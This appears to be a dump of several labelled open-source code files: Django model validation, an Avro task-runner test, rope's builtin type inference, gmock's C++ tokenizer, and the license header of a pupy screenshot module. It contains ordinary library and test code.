e.add(opts, "Accessor for m2m field '%s' clashes with related field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.get_accessor_name(), f.name))
if r.get_accessor_name() == rel_query_name:
e.add(opts, "Reverse query name for m2m field '%s' clashes with related field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.get_accessor_name(), f.name))
# Check ordering attribute.
if opts.ordering:
for field_name in opts.ordering:
if field_name == '?': continue
if field_name.startswith('-'):
field_name = field_name[1:]
if opts.order_with_respect_to and field_name == '_order':
continue
# Skip ordering in the format field1__field2 (FIXME: checking
# this format would be nice, but it's a little fiddly).
if '__' in field_name:
continue
# Skip ordering on pk. This is always a valid order_by field
# but is an alias and therefore won't be found by opts.get_field.
if field_name == 'pk':
continue
try:
opts.get_field(field_name, many_to_many=False)
except models.FieldDoesNotExist:
e.add(opts, '"ordering" refers to "%s", a field that doesn\'t exist.' % field_name)
# Check unique_together.
for ut in opts.unique_together:
for field_name in ut:
try:
f = opts.get_field(field_name, many_to_many=True)
except models.FieldDoesNotExist:
e.add(opts, '"unique_together" refers to %s, a field that doesn\'t exist. Check your syntax.' % field_name)
else:
if isinstance(f.rel, models.ManyToManyRel):
e.add(opts, '"unique_together" refers to %s. ManyToManyFields are not supported in unique_together.' % f.name)
if f not in opts.local_fields:
e.add(opts, '"unique_together" refers to %s. This is not in the same model as the unique_together statement.' % f.name)
return len(e.errors)
| bsd-3-clause |
apache/avro | lang/py/avro/test/test_tether_task_runner.py | 2 | 6739 | #!/usr/bin/env python3
##
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import io
import logging
import os
import subprocess
import sys
import time
import unittest
import avro.io
import avro.test.mock_tether_parent
import avro.test.word_count_task
import avro.tether.tether_task
import avro.tether.tether_task_runner
import avro.tether.util
class TestTetherTaskRunner(unittest.TestCase):
"""unit test for a tethered task runner."""
def test1(self):
# set the logging level to debug so that debug messages are printed
logging.basicConfig(level=logging.DEBUG)
proc = None
try:
# launch the server in a separate process
parent_port = avro.tether.util.find_port()
pyfile = avro.test.mock_tether_parent.__file__
proc = subprocess.Popen([sys.executable, pyfile, "start_server", f"{parent_port}"])
input_port = avro.tether.util.find_port()
print(f"Mock server started process pid={proc.pid}")
# Possible race condition? open tries to connect to the subprocess before the subprocess is fully started
# so we give the subprocess time to start up
time.sleep(1)
runner = avro.tether.tether_task_runner.TaskRunner(avro.test.word_count_task.WordCountTask())
runner.start(outputport=parent_port, join=False)
# Test sending various messages to the server and ensuring they are processed correctly
requestor = avro.tether.tether_task.HTTPRequestor(
"localhost",
runner.server.server_address[1],
avro.tether.tether_task.inputProtocol,
)
# TODO: We should validate that open worked by grabbing the STDOUT of the subproces
# and ensuring that it outputted the correct message.
# Test the mapper
requestor.request(
"configure",
{
"taskType": avro.tether.tether_task.TaskType.MAP,
"inSchema": str(runner.task.inschema),
"outSchema": str(runner.task.midschema),
},
)
# Serialize some data so we can send it to the input function
datum = "This is a line of text"
writer = io.BytesIO()
encoder = avro.io.BinaryEncoder(writer)
datum_writer = avro.io.DatumWriter(runner.task.inschema)
datum_writer.write(datum, encoder)
writer.seek(0)
data = writer.read()
# Call input to simulate calling map
requestor.request("input", {"data": data, "count": 1})
# Test the reducer
requestor.request(
"configure",
{
"taskType": avro.tether.tether_task.TaskType.REDUCE,
"inSchema": str(runner.task.midschema),
"outSchema": str(runner.task.outschema),
},
)
# Serialize some data so we can send it to the input function
datum = {"key": "word", "value": 2}
writer = io.BytesIO()
encoder = avro.io.BinaryEncoder(writer)
datum_writer = avro.io.DatumWriter(runner.task.midschema)
datum_writer.write(datum, encoder)
writer.seek(0)
data = writer.read()
# Call input to simulate calling reduce
requestor.request("input", {"data": data, "count": 1})
requestor.request("complete", {})
runner.task.ready_for_shutdown.wait()
runner.server.shutdown()
# time.sleep(2)
# runner.server.shutdown()
sthread = runner.sthread
# Possible race condition?
time.sleep(1)
# make sure the other thread terminated
self.assertFalse(sthread.is_alive())
# shutdown the logging
logging.shutdown()
finally:
# close the process
if not (proc is None):
proc.kill()
def test2(self):
"""
In this test we want to make sure that when we run "tether_task_runner.py"
as our main script everything works as expected. We do this by using subprocess to run it
in a separate thread.
"""
proc = None
runnerproc = None
try:
# launch the server in a separate process
parent_port = avro.tether.util.find_port()
pyfile = avro.test.mock_tether_parent.__file__
proc = subprocess.Popen([sys.executable, pyfile, "start_server", f"{parent_port}"])
# Possible race condition? when we start tether_task_runner it will call
# open tries to connect to the subprocess before the subprocess is fully started
# so we give the subprocess time to start up
time.sleep(1)
# start the tether_task_runner in a separate process
runnerproc = subprocess.Popen(
[
sys.executable,
avro.tether.tether_task_runner.__file__,
"avro.test.word_count_task.WordCountTask",
],
env={"AVRO_TETHER_OUTPUT_PORT": f"{parent_port}", "PYTHONPATH": ":".join(sys.path)},
)
# possible race condition wait for the process to start
time.sleep(1)
print(f"Mock server started process pid={proc.pid}")
# Possible race condition? open tries to connect to the subprocess before the subprocess is fully started
# so we give the subprocess time to start up
time.sleep(1)
finally:
# close the process
if not (runnerproc is None):
runnerproc.kill()
if not (proc is None):
proc.kill()
if __name__ == ("__main__"): # pragma: no coverage
unittest.main()
| apache-2.0 |
muff1nman/Vim | vim/eclim/autoload/eclim/python/rope/base/builtins.py | 9 | 23636 | """This module trys to support builtin types and functions."""
import inspect
import rope.base.evaluate
from rope.base import pynames, pyobjects, arguments, utils
class BuiltinModule(pyobjects.AbstractModule):
def __init__(self, name, pycore=None, initial={}):
super(BuiltinModule, self).__init__()
self.name = name
self.pycore = pycore
self.initial = initial
parent = None
def get_attributes(self):
return self.attributes
def get_doc(self):
if self.module:
return self.module.__doc__
def get_name(self):
return self.name.split('.')[-1]
@property
@utils.saveit
def attributes(self):
result = _object_attributes(self.module, self)
result.update(self.initial)
if self.pycore is not None:
submodules = self.pycore._builtin_submodules(self.name)
for name, module in submodules.iteritems():
result[name] = rope.base.builtins.BuiltinName(module)
return result
@property
@utils.saveit
def module(self):
try:
result = __import__(self.name)
for token in self.name.split('.')[1:]:
result = getattr(result, token, None)
return result
except ImportError:
return
class _BuiltinElement(object):
def __init__(self, builtin, parent=None):
self.builtin = builtin
self._parent = parent
def get_doc(self):
if self.builtin:
return getattr(self.builtin, '__doc__', None)
def get_name(self):
if self.builtin:
return getattr(self.builtin, '__name__', None)
@property
def parent(self):
if self._parent is None:
return builtins
return self._parent
class BuiltinClass(_BuiltinElement, pyobjects.AbstractClass):
def __init__(self, builtin, attributes, parent=None):
_BuiltinElement.__init__(self, builtin, parent)
pyobjects.AbstractClass.__init__(self)
self.initial = attributes
@utils.saveit
def get_attributes(self):
result = _object_attributes(self.builtin, self)
result.update(self.initial)
return result
class BuiltinFunction(_BuiltinElement, pyobjects.AbstractFunction):
def __init__(self, returned=None, function=None, builtin=None,
argnames=[], parent=None):
_BuiltinElement.__init__(self, builtin, parent)
pyobjects.AbstractFunction.__init__(self)
self.argnames = argnames
self.returned = returned
self.function = function
def get_returned_object(self, args):
if self.function is not None:
return self.function(_CallContext(self.argnames, args))
else:
return self.returned
def get_param_names(self, special_args=True):
return self.argnames
class BuiltinUnknown(_BuiltinElement, pyobjects.PyObject):
def __init__(self, builtin):
super(BuiltinUnknown, self).__init__(pyobjects.get_unknown())
self.builtin = builtin
self.type = pyobjects.get_unknown()
@utils.saveit
def get_attributes(self):
return _object_attributes(self.builtin, self)
def _object_attributes(obj, parent):
attributes = {}
for name in dir(obj):
if name == 'None':
continue
child = getattr(obj, name)
pyobject = None
if inspect.isclass(child):
pyobject = BuiltinClass(child, {}, parent=parent)
elif inspect.isroutine(child):
pyobject = BuiltinFunction(builtin=child, parent=parent)
else:
pyobject = BuiltinUnknown(builtin=child)
attributes[name] = BuiltinName(pyobject)
return attributes
def _create_builtin_type_getter(cls):
def _get_builtin(*args):
if not hasattr(cls, '_generated'):
cls._generated = {}
if args not in cls._generated:
cls._generated[args] = cls(*args)
return cls._generated[args]
return _get_builtin
def _create_builtin_getter(cls):
type_getter = _create_builtin_type_getter(cls)
def _get_builtin(*args):
return pyobjects.PyObject(type_getter(*args))
return _get_builtin
class _CallContext(object):
def __init__(self, argnames, args):
self.argnames = argnames
self.args = args
def _get_scope_and_pyname(self, pyname):
if pyname is not None and isinstance(pyname, pynames.AssignedName):
pymodule, lineno = pyname.get_definition_location()
if pymodule is None:
return None, None
if lineno is None:
lineno = 1
scope = pymodule.get_scope().get_inner_scope_for_line(lineno)
name = None
while name is None and scope is not None:
for current in scope.get_names():
if scope[current] is pyname:
name = current
break
else:
scope = scope.parent
return scope, name
return None, None
def get_argument(self, name):
if self.args:
args = self.args.get_arguments(self.argnames)
return args[self.argnames.index(name)]
def get_pyname(self, name):
if self.args:
args = self.args.get_pynames(self.argnames)
if name in self.argnames:
return args[self.argnames.index(name)]
def get_arguments(self, argnames):
if self.args:
return self.args.get_arguments(argnames)
def get_pynames(self, argnames):
if self.args:
return self.args.get_pynames(argnames)
def get_per_name(self):
if self.args is None:
return None
pyname = self.args.get_instance_pyname()
scope, name = self._get_scope_and_pyname(pyname)
if name is not None:
pymodule = pyname.get_definition_location()[0]
return pymodule.pycore.object_info.get_per_name(scope, name)
return None
def save_per_name(self, value):
if self.args is None:
return None
pyname = self.args.get_instance_pyname()
scope, name = self._get_scope_and_pyname(pyname)
if name is not None:
pymodule = pyname.get_definition_location()[0]
pymodule.pycore.object_info.save_per_name(scope, name, value)
class _AttributeCollector(object):
def __init__(self, type):
self.attributes = {}
self.type = type
def __call__(self, name, returned=None, function=None,
argnames=['self'], check_existence=True):
try:
builtin = getattr(self.type, name)
except AttributeError:
if check_existence:
raise
builtin=None
self.attributes[name] = BuiltinName(
BuiltinFunction(returned=returned, function=function,
argnames=argnames, builtin=builtin))
def __setitem__(self, name, value):
self.attributes[name] = value
class List(BuiltinClass):
def __init__(self, holding=None):
self.holding = holding
collector = _AttributeCollector(list)
collector('__iter__', function=self._iterator_get)
collector('__new__', function=self._new_list)
# Adding methods
collector('append', function=self._list_add, argnames=['self', 'value'])
collector('__setitem__', function=self._list_add,
argnames=['self', 'index', 'value'])
collector('insert', function=self._list_add,
argnames=['self', 'index', 'value'])
collector('extend', function=self._self_set,
argnames=['self', 'iterable'])
# Getting methods
collector('__getitem__', function=self._list_get)
collector('pop', function=self._list_get)
collector('__getslice__', function=self._self_get)
super(List, self).__init__(list, collector.attributes)
def _new_list(self, args):
return _create_builtin(args, get_list)
def _list_add(self, context):
if self.holding is not None:
return
holding = context.get_argument('value')
if holding is not None and holding != pyobjects.get_unknown():
context.save_per_name(holding)
def _self_set(self, context):
if self.holding is not None:
return
iterable = context.get_pyname('iterable')
holding = _infer_sequence_for_pyname(iterable)
if holding is not None and holding != pyobjects.get_unknown():
context.save_per_name(holding)
def _list_get(self, context):
if self.holding is not None:
return self.holding
return context.get_per_name()
def _iterator_get(self, context):
return get_iterator(self._list_get(context))
def _self_get(self, context):
return get_list(self._list_get(context))
get_list = _create_builtin_getter(List)
get_list_type = _create_builtin_type_getter(List)
class Dict(BuiltinClass):
def __init__(self, keys=None, values=None):
self.keys = keys
self.values = values
item = get_tuple(self.keys, self.values)
collector = _AttributeCollector(dict)
collector('__new__', function=self._new_dict)
collector('__setitem__', function=self._dict_add)
collector('popitem', function=self._item_get)
collector('pop', function=self._value_get)
collector('get', function=self._key_get)
collector('keys', function=self._key_list)
collector('values', function=self._value_list)
collector('items', function=self._item_list)
collector('copy', function=self._self_get)
collector('__getitem__', function=self._value_get)
collector('__iter__', function=self._key_iter)
collector('update', function=self._self_set)
super(Dict, self).__init__(dict, collector.attributes)
def _new_dict(self, args):
def do_create(holding=None):
if holding is None:
return get_dict()
type = holding.get_type()
if isinstance(type, Tuple) and len(type.get_holding_objects()) == 2:
return get_dict(*type.get_holding_objects())
return _create_builtin(args, do_create)
def _dict_add(self, context):
if self.keys is not None:
return
key, value = context.get_arguments(['self', 'key', 'value'])[1:]
if key is not None and key != pyobjects.get_unknown():
context.save_per_name(get_tuple(key, value))
def _item_get(self, context):
if self.keys is not None:
return get_tuple(self.keys, self.values)
item = context.get_per_name()
if item is None or not isinstance(item.get_type(), Tuple):
return get_tuple(self.keys, self.values)
return item
def _value_get(self, context):
item = self._item_get(context).get_type()
return item.get_holding_objects()[1]
def _key_get(self, context):
item = self._item_get(context).get_type()
return item.get_holding_objects()[0]
def _value_list(self, context):
return get_list(self._value_get(context))
def _key_list(self, context):
return get_list(self._key_get(context))
def _item_list(self, context):
return get_list(self._item_get(context))
def _value_iter(self, context):
return get_iterator(self._value_get(context))
def _key_iter(self, context):
return get_iterator(self._key_get(context))
def _item_iter(self, context):
return get_iterator(self._item_get(context))
def _self_get(self, context):
item = self._item_get(context).get_type()
key, value = item.get_holding_objects()[:2]
return get_dict(key, value)
def _self_set(self, context):
if self.keys is not None:
return
new_dict = context.get_pynames(['self', 'd'])[1]
if new_dict and isinstance(new_dict.get_object().get_type(), Dict):
args = arguments.ObjectArguments([new_dict])
items = new_dict.get_object()['popitem'].\
get_object().get_returned_object(args)
context.save_per_name(items)
else:
holding = _infer_sequence_for_pyname(new_dict)
if holding is not None and isinstance(holding.get_type(), Tuple):
context.save_per_name(holding)
get_dict = _create_builtin_getter(Dict)
get_dict_type = _create_builtin_type_getter(Dict)
class Tuple(BuiltinClass):
def __init__(self, *objects):
self.objects = objects
first = None
if objects:
first = objects[0]
attributes = {
'__getitem__': BuiltinName(BuiltinFunction(first)),
'__getslice__': BuiltinName(BuiltinFunction(pyobjects.PyObject(self))),
'__new__': BuiltinName(BuiltinFunction(function=self._new_tuple)),
'__iter__': BuiltinName(BuiltinFunction(get_iterator(first)))}
super(Tuple, self).__init__(tuple, attributes)
def get_holding_objects(self):
return self.objects
def _new_tuple(self, args):
return _create_builtin(args, get_tuple)
get_tuple = _create_builtin_getter(Tuple)
get_tuple_type = _create_builtin_type_getter(Tuple)
class Set(BuiltinClass):
def __init__(self, holding=None):
self.holding = holding
collector = _AttributeCollector(set)
collector('__new__', function=self._new_set)
self_methods = ['copy', 'difference', 'intersection',
'symmetric_difference', 'union']
for method in self_methods:
collector(method, function=self._self_get)
collector('add', function=self._set_add)
collector('update', function=self._self_set)
collector('update', function=self._self_set)
collector('symmetric_difference_update', function=self._self_set)
collector('difference_update', function=self._self_set)
collector('pop', function=self._set_get)
collector('__iter__', function=self._iterator_get)
super(Set, self).__init__(set, collector.attributes)
def _new_set(self, args):
return _create_builtin(args, get_set)
def _set_add(self, context):
if self.holding is not None:
return
holding = context.get_arguments(['self', 'value'])[1]
if holding is not None and holding != pyobjects.get_unknown():
context.save_per_name(holding)
def _self_set(self, context):
if self.holding is not None:
return
iterable = context.get_pyname('iterable')
holding = _infer_sequence_for_pyname(iterable)
if holding is not None and holding != pyobjects.get_unknown():
context.save_per_name(holding)
def _set_get(self, context):
if self.holding is not None:
return self.holding
return context.get_per_name()
def _iterator_get(self, context):
return get_iterator(self._set_get(context))
def _self_get(self, context):
return get_list(self._set_get(context))
get_set = _create_builtin_getter(Set)
get_set_type = _create_builtin_type_getter(Set)
class Str(BuiltinClass):
def __init__(self):
self_object = pyobjects.PyObject(self)
collector = _AttributeCollector(str)
collector('__iter__', get_iterator(self_object), check_existence=False)
self_methods = ['__getitem__', '__getslice__', 'capitalize', 'center',
'decode', 'encode', 'expandtabs', 'join', 'ljust',
'lower', 'lstrip', 'replace', 'rjust', 'rstrip', 'strip',
'swapcase', 'title', 'translate', 'upper', 'zfill']
for method in self_methods:
collector(method, self_object)
for method in ['rsplit', 'split', 'splitlines']:
collector(method, get_list(self_object))
super(Str, self).__init__(str, collector.attributes)
def get_doc(self):
return str.__doc__
get_str = _create_builtin_getter(Str)
get_str_type = _create_builtin_type_getter(Str)
class BuiltinName(pynames.PyName):
def __init__(self, pyobject):
self.pyobject = pyobject
def get_object(self):
return self.pyobject
def get_definition_location(self):
return (None, None)
class Iterator(pyobjects.AbstractClass):
def __init__(self, holding=None):
super(Iterator, self).__init__()
self.holding = holding
self.attributes = {
'next': BuiltinName(BuiltinFunction(self.holding)),
'__iter__': BuiltinName(BuiltinFunction(self))}
def get_attributes(self):
return self.attributes
def get_returned_object(self, args):
return self.holding
get_iterator = _create_builtin_getter(Iterator)
class Generator(pyobjects.AbstractClass):
def __init__(self, holding=None):
super(Generator, self).__init__()
self.holding = holding
self.attributes = {
'next': BuiltinName(BuiltinFunction(self.holding)),
'__iter__': BuiltinName(BuiltinFunction(get_iterator(self.holding))),
'close': BuiltinName(BuiltinFunction()),
'send': BuiltinName(BuiltinFunction()),
'throw': BuiltinName(BuiltinFunction())}
def get_attributes(self):
return self.attributes
def get_returned_object(self, args):
return self.holding
get_generator = _create_builtin_getter(Generator)
class File(BuiltinClass):
def __init__(self):
self_object = pyobjects.PyObject(self)
str_object = get_str()
str_list = get_list(get_str())
attributes = {}
def add(name, returned=None, function=None):
builtin = getattr(file, name, None)
attributes[name] = BuiltinName(
BuiltinFunction(returned=returned, function=function,
builtin=builtin))
add('__iter__', get_iterator(str_object))
for method in ['next', 'read', 'readline', 'readlines']:
add(method, str_list)
for method in ['close', 'flush', 'lineno', 'isatty', 'seek', 'tell',
'truncate', 'write', 'writelines']:
add(method)
super(File, self).__init__(file, attributes)
get_file = _create_builtin_getter(File)
get_file_type = _create_builtin_type_getter(File)
class Property(BuiltinClass):
def __init__(self, fget=None, fset=None, fdel=None, fdoc=None):
self._fget = fget
self._fdoc = fdoc
attributes = {
'fget': BuiltinName(BuiltinFunction()),
'fset': BuiltinName(pynames.UnboundName()),
'fdel': BuiltinName(pynames.UnboundName()),
'__new__': BuiltinName(BuiltinFunction(function=_property_function))}
super(Property, self).__init__(property, attributes)
def get_property_object(self, args):
if isinstance(self._fget, pyobjects.AbstractFunction):
return self._fget.get_returned_object(args)
def _property_function(args):
parameters = args.get_arguments(['fget', 'fset', 'fdel', 'fdoc'])
return pyobjects.PyObject(Property(parameters[0]))
class Lambda(pyobjects.AbstractFunction):
def __init__(self, node, scope):
super(Lambda, self).__init__()
self.node = node
self.scope = scope
def get_returned_object(self, args):
result = rope.base.evaluate.eval_node(self.scope, self.node.body)
if result is not None:
return result.get_object()
else:
return pyobjects.get_unknown()
def get_pattributes(self):
return {}
class BuiltinObject(BuiltinClass):
def __init__(self):
super(BuiltinObject, self).__init__(object, {})
class BuiltinType(BuiltinClass):
def __init__(self):
super(BuiltinType, self).__init__(type, {})
def _infer_sequence_for_pyname(pyname):
if pyname is None:
return None
seq = pyname.get_object()
args = arguments.ObjectArguments([pyname])
if '__iter__' in seq:
iter = seq['__iter__'].get_object().\
get_returned_object(args)
if iter is not None and 'next' in iter:
holding = iter['next'].get_object().\
get_returned_object(args)
return holding
def _create_builtin(args, creator):
passed = args.get_pynames(['sequence'])[0]
if passed is None:
holding = None
else:
holding = _infer_sequence_for_pyname(passed)
if holding is not None:
return creator(holding)
else:
return creator()
def _range_function(args):
return get_list()
def _reversed_function(args):
return _create_builtin(args, get_iterator)
def _sorted_function(args):
return _create_builtin(args, get_list)
def _super_function(args):
passed_class, passed_self = args.get_arguments(['type', 'self'])
if passed_self is None:
return passed_class
else:
#pyclass = passed_self.get_type()
pyclass = passed_class
if isinstance(pyclass, pyobjects.AbstractClass):
supers = pyclass.get_superclasses()
if supers:
return pyobjects.PyObject(supers[0])
return passed_self
def _zip_function(args):
args = args.get_pynames(['sequence'])
objects = []
for seq in args:
if seq is None:
holding = None
else:
holding = _infer_sequence_for_pyname(seq)
objects.append(holding)
tuple = get_tuple(*objects)
return get_list(tuple)
def _enumerate_function(args):
passed = args.get_pynames(['sequence'])[0]
if passed is None:
holding = None
else:
holding = _infer_sequence_for_pyname(passed)
tuple = get_tuple(None, holding)
return get_iterator(tuple)
def _iter_function(args):
passed = args.get_pynames(['sequence'])[0]
if passed is None:
holding = None
else:
holding = _infer_sequence_for_pyname(passed)
return get_iterator(holding)
def _input_function(args):
return get_str()
_initial_builtins = {
'list': BuiltinName(get_list_type()),
'dict': BuiltinName(get_dict_type()),
'tuple': BuiltinName(get_tuple_type()),
'set': BuiltinName(get_set_type()),
'str': BuiltinName(get_str_type()),
'file': BuiltinName(get_file_type()),
'open': BuiltinName(get_file_type()),
'unicode': BuiltinName(get_str_type()),
'range': BuiltinName(BuiltinFunction(function=_range_function, builtin=range)),
'reversed': BuiltinName(BuiltinFunction(function=_reversed_function, builtin=reversed)),
'sorted': BuiltinName(BuiltinFunction(function=_sorted_function, builtin=sorted)),
'super': BuiltinName(BuiltinFunction(function=_super_function, builtin=super)),
'property': BuiltinName(BuiltinFunction(function=_property_function, builtin=property)),
'zip': BuiltinName(BuiltinFunction(function=_zip_function, builtin=zip)),
'enumerate': BuiltinName(BuiltinFunction(function=_enumerate_function, builtin=enumerate)),
'object': BuiltinName(BuiltinObject()),
'type': BuiltinName(BuiltinType()),
'iter': BuiltinName(BuiltinFunction(function=_iter_function, builtin=iter)),
'raw_input': BuiltinName(BuiltinFunction(function=_input_function, builtin=raw_input)),
}
builtins = BuiltinModule('__builtin__', initial=_initial_builtins)
| mit |
w-martin/tact | gmock/scripts/generator/cpp/tokenize.py | 679 | 9703 | #!/usr/bin/env python
#
# Copyright 2007 Neal Norwitz
# Portions Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tokenize C++ source code."""
__author__ = '[email protected] (Neal Norwitz)'
try:
# Python 3.x
import builtins
except ImportError:
# Python 2.x
import __builtin__ as builtins
import sys
from cpp import utils
if not hasattr(builtins, 'set'):
# Nominal support for Python 2.3.
from sets import Set as set
# Add $ as a valid identifier char since so much code uses it.
_letters = 'abcdefghijklmnopqrstuvwxyz'
VALID_IDENTIFIER_CHARS = set(_letters + _letters.upper() + '_0123456789$')
HEX_DIGITS = set('0123456789abcdefABCDEF')
INT_OR_FLOAT_DIGITS = set('01234567890eE-+')
# C++0x string preffixes.
_STR_PREFIXES = set(('R', 'u8', 'u8R', 'u', 'uR', 'U', 'UR', 'L', 'LR'))
# Token types.
UNKNOWN = 'UNKNOWN'
SYNTAX = 'SYNTAX'
CONSTANT = 'CONSTANT'
NAME = 'NAME'
PREPROCESSOR = 'PREPROCESSOR'
# Where the token originated from. This can be used for backtracking.
# It is always set to WHENCE_STREAM in this code.
WHENCE_STREAM, WHENCE_QUEUE = range(2)
class Token(object):
"""Data container to represent a C++ token.
Tokens can be identifiers, syntax char(s), constants, or
pre-processor directives.
start contains the index of the first char of the token in the source
end contains the index of the last char of the token in the source
"""
def __init__(self, token_type, name, start, end):
self.token_type = token_type
self.name = name
self.start = start
self.end = end
self.whence = WHENCE_STREAM
def __str__(self):
if not utils.DEBUG:
return 'Token(%r)' % self.name
return 'Token(%r, %s, %s)' % (self.name, self.start, self.end)
__repr__ = __str__
def _GetString(source, start, i):
i = source.find('"', i+1)
while source[i-1] == '\\':
# Count the trailing backslashes.
backslash_count = 1
j = i - 2
while source[j] == '\\':
backslash_count += 1
j -= 1
# When trailing backslashes are even, they escape each other.
if (backslash_count % 2) == 0:
break
i = source.find('"', i+1)
return i + 1
def _GetChar(source, start, i):
# NOTE(nnorwitz): may not be quite correct, should be good enough.
i = source.find("'", i+1)
while source[i-1] == '\\':
# Need to special case '\\'.
if (i - 2) > start and source[i-2] == '\\':
break
i = source.find("'", i+1)
# Try to handle unterminated single quotes (in a #if 0 block).
if i < 0:
i = start
return i + 1
def GetTokens(source):
"""Returns a sequence of Tokens.
Args:
source: string of C++ source code.
Yields:
Token that represents the next token in the source.
"""
# Cache various valid character sets for speed.
valid_identifier_chars = VALID_IDENTIFIER_CHARS
hex_digits = HEX_DIGITS
int_or_float_digits = INT_OR_FLOAT_DIGITS
int_or_float_digits2 = int_or_float_digits | set('.')
# Only ignore errors while in a #if 0 block.
ignore_errors = False
count_ifs = 0
i = 0
end = len(source)
while i < end:
# Skip whitespace.
while i < end and source[i].isspace():
i += 1
if i >= end:
return
token_type = UNKNOWN
start = i
c = source[i]
if c.isalpha() or c == '_': # Find a string token.
token_type = NAME
while source[i] in valid_identifier_chars:
i += 1
# String and character constants can look like a name if
# they are something like L"".
if (source[i] == "'" and (i - start) == 1 and
source[start:i] in 'uUL'):
# u, U, and L are valid C++0x character preffixes.
token_type = CONSTANT
i = _GetChar(source, start, i)
elif source[i] == "'" and source[start:i] in _STR_PREFIXES:
token_type = CONSTANT
i = _GetString(source, start, i)
elif c == '/' and source[i+1] == '/': # Find // comments.
i = source.find('\n', i)
if i == -1: # Handle EOF.
i = end
continue
elif c == '/' and source[i+1] == '*': # Find /* comments. */
i = source.find('*/', i) + 2
continue
elif c in ':+-<>&|*=': # : or :: (plus other chars).
token_type = SYNTAX
i += 1
new_ch = source[i]
if new_ch == c:
i += 1
elif c == '-' and new_ch == '>':
i += 1
elif new_ch == '=':
i += 1
elif c in '()[]{}~!?^%;/.,': # Handle single char tokens.
token_type = SYNTAX
i += 1
if c == '.' and source[i].isdigit():
token_type = CONSTANT
i += 1
while source[i] in int_or_float_digits:
i += 1
# Handle float suffixes.
for suffix in ('l', 'f'):
if suffix == source[i:i+1].lower():
i += 1
break
elif c.isdigit(): # Find integer.
token_type = CONSTANT
if c == '0' and source[i+1] in 'xX':
# Handle hex digits.
i += 2
while source[i] in hex_digits:
i += 1
else:
while source[i] in int_or_float_digits2:
i += 1
# Handle integer (and float) suffixes.
for suffix in ('ull', 'll', 'ul', 'l', 'f', 'u'):
size = len(suffix)
if suffix == source[i:i+size].lower():
i += size
break
elif c == '"': # Find string.
token_type = CONSTANT
i = _GetString(source, start, i)
elif c == "'": # Find char.
token_type = CONSTANT
i = _GetChar(source, start, i)
elif c == '#': # Find pre-processor command.
token_type = PREPROCESSOR
got_if = source[i:i+3] == '#if' and source[i+3:i+4].isspace()
if got_if:
count_ifs += 1
elif source[i:i+6] == '#endif':
count_ifs -= 1
if count_ifs == 0:
ignore_errors = False
# TODO(nnorwitz): handle preprocessor statements (\ continuations).
while 1:
i1 = source.find('\n', i)
i2 = source.find('//', i)
i3 = source.find('/*', i)
i4 = source.find('"', i)
# NOTE(nnorwitz): doesn't handle comments in #define macros.
# Get the first important symbol (newline, comment, EOF/end).
i = min([x for x in (i1, i2, i3, i4, end) if x != -1])
# Handle #include "dir//foo.h" properly.
if source[i] == '"':
i = source.find('"', i+1) + 1
assert i > 0
continue
# Keep going if end of the line and the line ends with \.
if not (i == i1 and source[i-1] == '\\'):
if got_if:
condition = source[start+4:i].lstrip()
if (condition.startswith('0') or
condition.startswith('(0)')):
ignore_errors = True
break
i += 1
elif c == '\\': # Handle \ in code.
# This is different from the pre-processor \ handling.
i += 1
continue
elif ignore_errors:
# The tokenizer seems to be in pretty good shape. This
# raise is conditionally disabled so that bogus code
# in an #if 0 block can be handled. Since we will ignore
# it anyways, this is probably fine. So disable the
# exception and return the bogus char.
i += 1
else:
sys.stderr.write('Got invalid token in %s @ %d token:%s: %r\n' %
('?', i, c, source[i-10:i+10]))
raise RuntimeError('unexpected token')
if i <= 0:
print('Invalid index, exiting now.')
return
yield Token(token_type, source[start:i], start, i)
if __name__ == '__main__':
def main(argv):
"""Driver mostly for testing purposes."""
for filename in argv[1:]:
source = utils.ReadFile(filename)
if source is None:
continue
for token in GetTokens(source):
print('%-12s: %s' % (token.token_type, token.name))
# print('\r%6.2f%%' % (100.0 * index / token.end),)
sys.stdout.write('\n')
main(sys.argv)
| gpl-3.0 |
benjamin-jones/pupy | pupy/modules/screenshot.py | 27 | 3951 | # -*- coding: UTF8 -*-
# --------------------------------------------------------------
# Copyright (c) 2015, Nicolas VERDIER ([email protected])
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
#
